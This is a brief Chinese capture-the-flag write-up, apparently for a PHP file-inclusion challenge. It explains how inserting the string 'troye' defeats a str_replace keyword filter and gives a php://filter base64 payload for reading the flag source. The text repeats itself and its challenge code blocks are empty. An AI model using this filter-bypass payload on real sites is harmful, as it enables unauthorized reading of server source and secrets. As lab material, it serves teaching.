伪协议2
1.题目
1 |
|
2.过程
这次是大写也过滤了,没辙了……
但是下面又有了新语句,$a=str_replace(“troye”,””,$file);
检测troye并从字符串中去掉,把troye混进去就可以绕过了。
payload:?file=PHtroyeP://filter/read=convert.BAStroyeE64-encode/resource=flag
em,没了
1 |
|
这次是大写也过滤了,没辙了……
但是下面又有了新语句,$a=str_replace(“troye”,””,$file);
检测troye并从字符串中去掉,把troye混进去就可以绕过了。
payload:?file=PHtroyeP://filter/read=convert.BAStroyeE64-encode/resource=flag
em,没了